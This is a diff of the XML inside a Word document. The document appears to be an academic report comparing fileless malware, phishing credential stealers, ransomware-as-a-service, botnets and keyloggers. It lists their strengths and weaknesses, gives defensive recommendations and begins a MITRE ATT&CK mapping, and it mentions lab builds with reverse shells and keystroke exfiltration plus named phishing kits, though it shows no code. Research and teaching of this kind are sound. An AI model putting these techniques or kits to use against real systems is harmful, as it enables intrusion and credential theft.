+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>obfuscated command, triggering a reverse shell without leaving a file behind. According to Sun et al. (2023), less than 12% of these attacks are detected during execution, highlighting their invisibility. However, setup requires moderate scripting knowledge and is often limited to systems with PowerShell or WMI access.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
         <w:t>Strengths:</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Extremely stealthy; avoids signature detection</w:t>
+        <w:t xml:space="preserve"> Simple to implement, highly effective at scale</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4285,65 +4174,49 @@
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Requires privileged PowerShell use and scripting skill</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Phishing-Based Credential Stealers</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Phishing remains one of the most successful attack vectors—not because of advanced code, but because it preys on human error. Even with modern training, users often fall for fake login screens when visual cues like logos and HTTPS are present (Bashir &amp; Papadopoulos, 2023). Credential stealers are incredibly easy to deploy using kits like </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-        <w:t>HiddenEye</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> or </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-        <w:t>SocialFish</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-        <w:t>. However, they are highly dependent on user action and cannot operate autonomously once detected.</w:t>
+        <w:t xml:space="preserve"> Relies on user interaction and social engineering</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Ransomware-as-a-Service (RaaS)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>RaaS demonstrates the professionali</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>ation of malware. Developers create powerful ransomware payloads and distribute them to affiliates for a share of the ransom. Ahmed et al. (2023) describe this model as “cybercrime franchising,” offering user dashboards, encryption tools, and technical support. Payloads are modular and often include obfuscation, anti-debugging, and hybrid encryption schemes. While damaging, these attacks are very visible, drawing attention from law enforcement and threat intelligence groups.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4364,7 +4237,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Simple to implement, highly effective at scale</w:t>
+        <w:t xml:space="preserve"> High impact, scalable attacks with built-in encryption</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4384,49 +4257,37 @@
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Relies on user interaction and social engineering</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Ransomware-as-a-Service (RaaS)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-        <w:t>RaaS demonstrates the professionali</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-        <w:t>s</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-        <w:t>ation of malware. Developers create powerful ransomware payloads and distribute them to affiliates for a share of the ransom. Ahmed et al. (2023) describe this model as “cybercrime franchising,” offering user dashboards, encryption tools, and technical support. Payloads are modular and often include obfuscation, anti-debugging, and hybrid encryption schemes. While damaging, these attacks are very visible, drawing attention from law enforcement and threat intelligence groups.</w:t>
+        <w:t xml:space="preserve"> High visibility; difficult to test or simulate ethically</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Botnet Malware</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>Botnets represent long-term control rather than quick payoff. They infect multiple devices and operate silently in the background, waiting for instructions from a C2 server. As demonstrated in simulation, bots can be programmed to respond to various tasks like pinging, exfiltrating data, or launching DDoS attacks. Singh et al. (2022) and Marczak &amp; Paxson (2023) highlight their use in both espionage and large-scale disruption. Botnets require multiple nodes and basic infrastructure, but offer wide operational flexibility.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4447,7 +4308,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
-        <w:t xml:space="preserve"> High impact, scalable attacks with built-in encryption</w:t>
+        <w:t xml:space="preserve"> Distributed control, supports multi-stage attacks</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4467,77 +4328,6 @@
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
-        <w:t xml:space="preserve"> High visibility; difficult to test or simulate ethically</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Botnet Malware</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-        <w:t>Botnets represent long-term control rather than quick payoff. They infect multiple devices and operate silently in the background, waiting for instructions from a C2 server. As demonstrated in simulation, bots can be programmed to respond to various tasks like pinging, exfiltrating data, or launching DDoS attacks. Singh et al. (2022) and Marczak &amp; Paxson (2023) highlight their use in both espionage and large-scale disruption. Botnets require multiple nodes and basic infrastructure, but offer wide operational flexibility.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Strengths:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Distributed control, supports multi-stage attacks</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Weaknesses:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
         <w:t xml:space="preserve"> Requires infrastructure and traffic analysis can expose them</w:t>
       </w:r>
     </w:p>
@@ -4568,14 +4358,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
-        <w:t xml:space="preserve">Keyloggers are often underestimated, yet they form the foundation of many advanced attacks. When combined with C2 capabilities and persistence, as shown in the implementation, they can </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>silently record and transmit everything a user types. Mourya et al. (2024) emphasi</w:t>
+        <w:t>Keyloggers are often underestimated, yet they form the foundation of many advanced attacks. When combined with C2 capabilities and persistence, as shown in the implementation, they can silently record and transmit everything a user types. Mourya et al. (2024) emphasi</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5123,6 +4906,7 @@
                 <w:lang w:eastAsia="en-AU"/>
                 <w14:ligatures w14:val="none"/>
               </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:t>Phishing Credential Stealer</w:t>
             </w:r>
           </w:p>
@@ -5992,7 +5776,7 @@
           <w:szCs w:val="34"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="11" w:name="_Toc194070988"/>
+      <w:bookmarkStart w:id="13" w:name="_Toc194070988"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
@@ -6002,81 +5786,81 @@
           <w:sz w:val="34"/>
           <w:szCs w:val="34"/>
         </w:rPr>
+        <w:t>5. Evaluation &amp; Recommendations</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="13"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>Evaluating these five malware developments reveals how different strategies cater to different attack goals. Some are built for stealth, others for maximum damage, and some for scalability. By comparing both the academic findings and live implementations, clearer patterns emerge about which malware techniques are most dangerous and why.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Fileless Malware</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>Fileless malware consistently emerges as the most adversarial technique among the five. It is not only difficult to detect but also very effective in gaining persistent access without leaving traces. In both research and the lab experiment, it operated entirely in memory, avoiding logs and traditional detection mechanisms. This method is ideal for attackers who need long-term, covert access to a target. The fact that even advanced antivirus software missed such activity during testing confirms its position as a high-threat vector.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Phishing Credential Stealers</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>5. Evaluation &amp; Recommendations</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="11"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-        <w:t>Evaluating these five malware developments reveals how different strategies cater to different attack goals. Some are built for stealth, others for maximum damage, and some for scalability. By comparing both the academic findings and live implementations, clearer patterns emerge about which malware techniques are most dangerous and why.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Fileless Malware</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-        <w:t>Fileless malware consistently emerges as the most adversarial technique among the five. It is not only difficult to detect but also very effective in gaining persistent access without leaving traces. In both research and the lab experiment, it operated entirely in memory, avoiding logs and traditional detection mechanisms. This method is ideal for attackers who need long-term, covert access to a target. The fact that even advanced antivirus software missed such activity during testing confirms its position as a high-threat vector.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Phishing Credential Stealers</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
         <w:t>Phishing is arguably the most accessible method for attackers. It requires little technical knowledge but continues to succeed because it targets people rather than machines. The literature confirmed that even trained users fall victim to realistic fake login pages, especially when simple trust indicators like HTTPS are present. However, phishing relies on user action, and as security awareness improves, its effectiveness could decrease. Nonetheless, when combined with tools like keyloggers or ransomware, phishing becomes a highly efficient entry point.</w:t>
       </w:r>
     </w:p>
@@ -6203,7 +5987,6 @@
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">The keylogger implementation proved that even a basic script could be transformed into an effective surveillance tool when paired with real-time exfiltration and persistence features. The experiment mirrored </w:t>
       </w:r>
       <w:r>
@@ -6317,7 +6100,14 @@
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
         <w:br/>
-        <w:t>Most phishing attacks still rely on deceptive links and fake interfaces. Email filtering, real-time URL analysis, and browser-level interventions (e.g., warning overlays or domain scoring) can reduce user exposure.</w:t>
+        <w:t xml:space="preserve">Most phishing attacks still rely on deceptive links and fake interfaces. Email filtering, real-time </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>URL analysis, and browser-level interventions (e.g., warning overlays or domain scoring) can reduce user exposure.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6429,6 +6219,1493 @@
         <w:br/>
         <w:t>Phishing continues to work because users often rely on surface-level trust indicators. Awareness campaigns must teach users how to inspect URLs, understand certificate misuse, and question suspicious communication—even if it looks familiar.</w:t>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>The evaluation should analyse about how potent the malware is against current defense mechanism.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> – 5 </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t xml:space="preserve">In what defense cases will this malware become </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>ineffective. do for the ones that are available and actually true.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="34"/>
+          <w:szCs w:val="34"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="34"/>
+          <w:szCs w:val="34"/>
+        </w:rPr>
+        <w:t>8. MITRE ATT&amp;CK Mapping</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t xml:space="preserve">To align the practical experiments in this report with real-world adversary behavior, the MITRE ATT&amp;CK framework was used to map each attack’s steps to corresponding </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Tactics, Techniques, and Procedures (TTPs)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. This mapping validates that the malware </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>behaviours</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> observed during testing closely resemble those used in the wild by actual threat actors.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>8.1 Fileless Malware (PowerShell + Metasploit)</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblCellSpacing w:w="15" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        </w:tblBorders>
+        <w:tblCellMar>
+          <w:top w:w="15" w:type="dxa"/>
+          <w:left w:w="15" w:type="dxa"/>
+          <w:bottom w:w="15" w:type="dxa"/>
+          <w:right w:w="15" w:type="dxa"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="1556"/>
+        <w:gridCol w:w="2716"/>
+        <w:gridCol w:w="1628"/>
+        <w:gridCol w:w="3456"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:tblHeader/>
+          <w:tblCellSpacing w:w="15" w:type="dxa"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Tactic</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Technique</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>ATT&amp;CK ID</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Explanation</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:tblCellSpacing w:w="15" w:type="dxa"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t>Initial Access</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
